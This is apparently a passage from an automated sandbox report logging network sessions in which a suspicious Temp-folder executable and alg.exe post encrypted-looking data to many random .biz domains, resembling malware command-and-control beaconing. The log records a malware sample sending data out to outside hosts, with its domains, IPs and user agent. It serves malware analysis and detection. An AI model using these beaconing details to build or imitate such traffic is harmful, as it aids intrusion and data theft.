Oct 20, 2024 18:42:03.223037958 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Sun, 20 Oct 2024 16:42:03 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49806	13.251.16.150	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:03.312983990 CEST	350	OUT	POST /wktespcp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ifsaia.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:03.313013077 CEST	826	OUT	Data Raw: 07 ac 0b f3 5f 24 68 cd 2e 03 00 00 ff 3d 5c f7 f6 a1 b2 77 8f 11 23 21 06 cf 75 83 3a 0c ff 9a e5 92 14 37 3d 5a ad 0b 1e 3e b1 ed 31 a1 7c 97 31 da 7b 14 9a 54 46 0d bc 3d 1c 1e 89 d2 db aa 06 c1 b3 1e c4 06 67 c7 5a 3d c4 ca f2 78 9b 8b c6 53 Data Ascii: _$h.=\w#!u:7=Z>1\|1{TF=gZ=xS!T5)jw]~-a@*N?P>W(5 Et\|"UpK#(;3\!0j}cH&&3.lvc^BcS-x1nX{JKomdE(
Oct 20, 2024 18:42:04.882339954 CEST	412	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 16:42:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=eee48c4599999f03d4a6236426454f93\|96.44.151.125\|1729442524\|1729442524\|0\|1\|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49807	13.251.16.150	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:03.477214098 CEST	352	OUT	POST /xraiohcidq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qaynky.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:03.477272034 CEST	778	OUT	Data Raw: 97 b1 1f 94 29 fb 83 e0 fe 02 00 00 6c cb bb 52 ce 94 9e c2 a3 b4 08 a9 f8 34 26 90 2f 18 14 2f 8c 29 9f d4 fe f0 d7 6b 2b 9d 1d 18 f6 4f a3 fa 20 70 53 f7 26 aa af ac 8e 11 10 44 9b 98 1e ea 68 53 b6 03 b9 a0 44 42 6d 1b 89 87 10 f4 7e 78 dc 31 Data Ascii: )lR4&//)k+O pS&DhSDBm~x1GzxEGC Qy].:$L%6L0L?Ka4TrLh`tt)2`\|jA5-!wiNhjXOW\|LO9";!q%.>"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49813	44.221.84.105	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:04.917820930 CEST	347	OUT	POST /vf HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:04.917854071 CEST	826	OUT	Data Raw: 71 54 16 c1 60 50 09 6e 2e 03 00 00 32 d1 c2 84 8f 21 9f 1f 26 34 51 b9 15 3d 1e 6d b3 ee 15 44 78 59 43 5b d3 e7 e7 1a cf 75 48 b3 69 3b f0 39 b6 6c 72 9b ee 71 0e 59 d5 92 90 0c 99 8c 4d 32 f3 10 42 d9 28 b5 21 48 d8 e6 15 13 ff 3b ba 36 f3 37 Data Ascii: qT`Pn.2!&4Q=mDxYC[uHi;9lrqYM2B(!H;673]#fcPxLk;LbCQ'FJ t#9'5(YjH4c>jU\|niHK*vR!\|NhQ%dn%"f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49815	13.251.16.150	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:05.085236073 CEST	356	OUT	POST /xykyylrqbfiyxv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qaynky.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:05.085268021 CEST	778	OUT	Data Raw: 21 17 03 43 2a 6e ea 0f fe 02 00 00 5e 21 2f df c8 74 63 cc 1d 3f b3 0c f7 c2 0b 99 55 f7 cd bd 5c f3 fb ad ed 6d aa 5c c9 dc 14 a6 c7 fe ab d0 22 09 97 2e a6 ea 65 2e fd 48 3a c5 e4 c5 59 d4 91 f9 dc d8 35 71 50 c0 61 b4 6d bb c2 4b 0f b7 6b 3a Data Ascii: !C*n^!/tc?U\m\".e.H:Y5qPamKk::2HipP:o`@<cf2$}6y%U47FL{6Y_(+TTJ}A%!Ys~3&;'{P17@4K0MQ%MIF]Gb:(y_a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49820	44.221.84.105	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:05.849627972 CEST	360	OUT	POST /fqkauqnsnykhqmm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:05.849648952 CEST	826	OUT	Data Raw: fe 0d 7c cd af 7c e9 97 2e 03 00 00 53 e6 41 df fd 0c 58 0f e9 36 f2 2d fc 98 30 09 60 a6 aa 02 8a fb 93 14 02 9c 06 e0 81 f7 86 e8 f9 24 2f 1c 1e e0 17 17 5e 1d 50 f1 35 5f a1 d3 0b 1c 19 c1 d5 de 85 f8 02 d5 21 73 e1 ab 29 e5 5b 98 d4 4a 6d d1 Data Ascii: \|\|.SAX6-0`$/^P5_!s)[JmQ9!xg%g:ACjLePby#TxLp]II{\|dt6nN /1WAIL*md3oTJEu_0FdVr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49824	18.141.10.107	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:06.822082043 CEST	349	OUT	POST /fuhcig HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:06.822113991 CEST	826	OUT	Data Raw: b5 05 17 cf 11 79 65 24 2e 03 00 00 69 e5 57 8d 90 45 34 6a 35 da 3a c9 45 5b e9 d1 36 ed 3f e4 23 79 75 89 e8 8e 40 53 79 c0 8f c7 07 45 ed 59 4f a4 31 71 3b b9 2b 92 11 d9 a1 4a cf 4c ba ee 3c 67 6a 1d 6b 71 ed c2 2a b0 2b aa 6c eb 8a e5 3d 8a Data Ascii: ye$.iWE4j5:E[6?#yu@SyEYO1q;+JL<gjkq*+l=4bq]2l8obP=mj`#VjDp9&C+[^hodn HP:Dm\&A8}kv{-Bfxzv:Dx=\|v{%Z _&x0Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49827	44.221.84.105	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:06.956960917 CEST	353	OUT	POST /hnkvsfse HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: bumxkqgxu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:06.956960917 CEST	778	OUT	Data Raw: 6b d1 8c 06 49 5b c1 27 fe 02 00 00 2d ae 85 59 36 9d b0 bd 60 9d 8c 2b b0 15 09 dd ad a3 61 29 b9 b3 1a c2 80 ab 79 b8 78 a0 32 b5 d9 38 53 06 ce bf 09 85 5b 02 db 63 29 73 08 05 77 e7 1b fd 0a 14 f1 29 7d 71 da 86 c7 54 6f 32 d7 3a 6e 42 d3 ed Data Ascii: kI['-Y6`+a)yx28S[c)sw)}qTo2:nBs)BQ0dl3sUVXhE2XwYX?}`d$`]g}e8Li&KTGXd(Zl[_QG#\F#LUm@qj
Oct 20, 2024 18:42:07.856920958 CEST	415	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 16:42:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=af2c5f65285893fbed8ce05bd9086a31\|96.44.151.125\|1729442527\|1729442527\|0\|1\|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49833	54.244.188.177	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:08.063750029 CEST	351	OUT	POST /sfsrqtr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dwrqljrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:08.063785076 CEST	778	OUT	Data Raw: 94 3c 7a 0c a3 6a 26 ac fe 02 00 00 4e dd 37 04 4c 45 de aa 93 65 a0 52 1e f6 a6 19 47 fd e5 74 b8 3a 45 08 bc 37 9c 68 9c 78 eb c5 fb 1f 87 e1 29 1e d3 37 a4 83 d1 60 5f f8 50 5d 04 bb 74 15 62 90 21 1e 38 3a cd 51 68 47 95 96 64 42 ef b6 2b 9c Data Ascii: <zj&N7LEeRGt:E7hx)7`_P]tb!8:QhGdB+jshHf\|}k%cb1VJq<<%Ao^9mNNdR\|#\|`O_Y~\tB.q>3)(e2o7ma

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49834	18.141.10.107	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:08.396838903 CEST	353	OUT	POST /dboalvdlyo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:08.396894932 CEST	826	OUT	Data Raw: 49 8c cd a0 52 ef 6d a2 2e 03 00 00 00 da b8 03 2d 6e 17 1d c3 bd 2e 5a ac 1f d7 00 c1 c7 03 09 83 0a 88 47 ef e8 5f dd e1 05 ea 3b 2e 8f 72 36 85 83 5e ad 62 a6 97 4b 33 0a 6a c6 a6 f4 fc 0b 7f 4f 59 e0 48 74 37 16 14 53 7b a2 42 f0 ad 4e 83 d2 Data Ascii: IRm.-n.ZG_;.r6^bK3jOYHt7S{BNjfh9&#b(/U;3l[Z -,~[,,E%}5V?nwvds@-\|D5Q6*ppO02n(o[,H W#\|8@J

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49838	54.244.188.177	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:09.127563953 CEST	356	OUT	POST /ikvygvnodbxw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dwrqljrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:09.127594948 CEST	778	OUT	Data Raw: 6b bb 3d 12 71 ef 16 69 fe 02 00 00 64 5c 55 09 8c b5 e3 26 de 8f 6c 5b e7 ba 37 65 a2 4c d3 78 5c a9 64 7c ae 9e e1 c6 90 ff f6 e8 07 e1 bb e1 ac 41 68 6a 81 c9 f4 30 d3 4d 74 14 7b 10 94 9f 1b 93 ed f8 51 7c 23 bf e6 af 60 b4 16 7f 9a ac 7f 95 Data Ascii: k=qid\U&l[7eLx\d\|Ahj0Mt{Q\|#`Cz9AbL^%7\|1MbDLZQvjle`J4euaSrbBlpTZ7}_c[}7zf_,Tqi]4?@n+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49845	35.164.78.200	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:10.208611965 CEST	347	OUT	POST /bdtrq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: nqwjmb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:10.208612919 CEST	778	OUT	Data Raw: bf 6b 19 ed 0d 45 86 fa fe 02 00 00 63 53 3b 3f 2b 7f 52 61 82 59 2d fb e1 bd d8 33 cc ca 7a cf c3 22 d9 75 7d 0f e1 68 27 23 65 66 76 e8 68 f8 fc 61 17 8f d5 d5 58 04 12 48 75 be b7 b3 4a 20 46 b2 a2 81 22 8a ba da 50 79 77 7f 5d 41 19 75 4f 7a Data Ascii: kEcS;?+RaY-3z"u}h'#efvhaXHuJ F"Pyw]AuOz'"/'S?LgCTX)~k<FOi\|]b,}Z:"C;'/?.%vr"y8dh$G(cg)Q9+iWl;Jm\1{-G;\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49848	172.234.222.138	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:10.434334040 CEST	344	OUT	POST /bql HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:10.434345007 CEST	826	OUT	Data Raw: 22 28 96 39 3c 65 83 cb 2e 03 00 00 47 b0 47 83 ea 45 3a 8b c1 78 b8 81 e8 1e ce 89 5f af 64 ec ef 38 31 81 2b 21 db df 82 a2 a9 5b ff 81 db e3 0c 83 14 32 28 f3 3b 25 b6 26 92 c1 e9 24 21 11 6a 65 4e 3a bf 4c 61 d5 3e ca 37 f8 fe 2c 82 81 2d 95 Data Ascii: "(9<e.GGE:x_d81+![2(;%&$!jeN:La>7,-xI7>[69zfC-}w}K:=#_aV4-mJFGt$exzItMo(~>&VxJ\q=jhY\]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49852	172.234.222.138	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:11.412282944 CEST	347	OUT	POST /rtktsu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:11.412282944 CEST	826	OUT	Data Raw: a5 45 50 de d6 f3 c0 5d 2e 03 00 00 5a 26 b6 5d d5 1f 16 f1 01 3e 6a 97 a9 fc 3a c3 cc 59 2a b8 95 a0 d4 cf 36 16 14 4b 16 6e 60 9b df db 1b 1b b6 98 10 4d 2d b9 59 28 41 60 60 f4 ca fc ec 0e 2b 2c 0c b4 e6 b3 4c ad 19 18 64 27 90 83 07 1a 61 cf Data Ascii: EP].Z&]>j:Y6Kn`M-Y(A``+,Ld'aMF.1}Hu~Z)afz=.w"H`a;y`^zGrO+`i*9+5TCQB]_kUvrlS4!2P1,AV?J=mUJoMH4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49855	35.164.78.200	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:12.199834108 CEST	345	OUT	POST /swl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: nqwjmb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:12.199897051 CEST	778	OUT	Data Raw: 42 58 ef 90 aa d9 8c a4 fe 02 00 00 76 74 34 5d b9 82 da 54 be d6 df 26 e1 f9 ef 69 71 32 47 0c 31 b3 00 3b ef 5c 01 f0 54 b1 de 55 0a 7c 92 61 c2 0f 17 01 27 d8 39 31 2e 36 e6 14 b0 b9 05 7e 43 d8 85 d9 76 c4 f0 99 e3 e2 d7 1b 8f 93 56 0d 19 b6 Data Ascii: BXvt4]T&iq2G1;\TU\|a'91.6~CvVyTI+`7&B">^eiQELboY>(e4X~Ij4F`:]h#d_drX$i\lahj$)zke0)c(@6`d$j$O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49859	34.246.200.160	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:12.364347935 CEST	346	OUT	POST /yfkb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: tbjrpv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:12.364347935 CEST	826	OUT	Data Raw: 33 be 97 93 38 f0 80 9c 2e 03 00 00 8a c6 22 3c fe e3 a5 df af 52 03 9c b7 eb e5 40 f6 c9 35 11 16 e5 d3 d6 6f 68 83 62 45 29 2f c8 0a 2b 2a 3f d6 9f 2c c9 f9 92 48 11 91 3f b0 19 d5 ad 7b 53 b8 76 33 2d 27 31 00 00 27 2e 9c b9 e7 69 01 d4 8a 24 Data Ascii: 38."<R@5ohbE)/+?,H?{Sv3-'1'.i$IENE(1\|PwmP%d^<P HC,!gYP.P46S;nEaC9UJT`vkj.A]cX&:1[M)L@X!l"{O[}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49863	3.94.10.34	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:13.411633968 CEST	349	OUT	POST /rnre HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ytctnunms.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:13.411669970 CEST	778	OUT	Data Raw: 32 44 50 15 fb de e4 71 fe 02 00 00 67 39 e5 70 69 3b 94 58 35 80 e7 5e 59 9d 67 03 ae 36 00 63 d9 9f a1 df 39 86 03 ba 36 23 4a 09 49 d4 50 74 9a 9c 96 46 a4 ba 91 46 3a 3c 26 ce a9 62 63 05 81 79 fe 97 4f 88 12 3e df 5b e2 d6 a7 1d d1 a4 9e f5 Data Ascii: 2DPqg9pi;X5^Yg6c96#JIPtFF:<&bcyO>[moiPj!J"r?O[P"Qh-w_{;ZSEwk}EF0b0_(YsPCe<<1Y=[@\hiDoIeESX[Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49866	34.246.200.160	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:13.612545967 CEST	350	OUT	POST /fkekmmmc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: tbjrpv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:13.612577915 CEST	826	OUT	Data Raw: 57 32 37 da 90 7d b9 6d 2e 03 00 00 73 79 76 bb 84 9c ef f3 1d e4 61 5f 95 ee 75 ac 9d 65 e6 c9 66 59 41 ca 2c 03 4f 07 9b 53 24 16 90 45 c7 0b 11 5c 03 e1 13 d8 cb e6 c0 c0 2c cf ca 63 a5 d7 4c 42 3a 07 54 94 06 12 d8 a2 aa 32 27 79 b1 33 d0 fe Data Ascii: W27}m.syva_uefYA,OS$E\,cLB:T2'y3Gkw!-\)SLpBbr$[B4f&u{XQz5@2oV1_DYPKR(rzy7H:JVEN0ztyNeu]n*wL.iBY~x[)n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49868	3.94.10.34	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:14.357108116 CEST	357	OUT	POST /lmccoqeoetyh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ytctnunms.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:14.357141018 CEST	778	OUT	Data Raw: 8b ad 36 7c f7 d0 d9 af fe 02 00 00 04 c6 1b a5 27 b1 3d cd b6 74 c6 f7 a5 d2 0a 94 4d 7e c3 15 08 d4 fc 41 c4 75 7b aa b2 1d c7 10 f7 00 5b ff c4 a2 95 69 9e 59 7c 3a 58 1d a9 c8 97 a2 c2 ed ec 08 9f 51 e0 1f 37 c7 4b 80 62 88 69 d4 72 aa 45 94 Data Ascii: 6\|'=tM~Au{[iY\|:XQ7KbirE}HD5/AtE`lu__%RBW+VxcS~OdVN;mUN,M)w.:d:8QiO0"XyQM?0SEadIp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49873	18.208.156.248	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:14.977901936 CEST	345	OUT	POST /mytb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: deoci.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:14.977977991 CEST	826	OUT	Data Raw: 93 8b ac 1b 87 8d 4e 7e 2e 03 00 00 87 61 92 ef 12 19 49 1d de c1 bf da cb ef 26 1d c4 d8 e9 ce cd 3b d5 81 25 c6 40 55 e6 9c fb 12 65 d8 41 de 27 34 9d 67 4c 33 c5 8c 86 79 9f 59 35 55 cd 07 3b 9f 58 b9 68 b6 66 39 9a ca e0 80 02 30 51 fb 17 a7 Data Ascii: N~.aI&;%@UeA'4gL3yY5U;Xhf90Q(Dy"6<]DbA"yBj0-p+'-Blsz<qTwZC/ag^9 ^dukAY;Gci8p)=xp;FOPK!<9P#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49875	165.160.15.20	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:15.781613111 CEST	355	OUT	POST /xdytdotbepaidw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
